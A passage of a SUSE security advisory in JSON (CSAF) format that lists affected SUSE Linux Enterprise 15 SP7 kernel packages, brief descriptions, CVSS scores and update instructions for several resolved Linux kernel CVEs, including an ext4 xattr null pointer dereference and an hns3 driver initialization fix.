"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68820"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68820",
"url": "https://www.suse.com/security/cve/CVE-2025-68820"
},
{
"category": "external",
"summary": "SUSE Bug 1256754 for CVE-2025-68820",
"url": "https://bugzilla.suse.com/1256754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-71064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
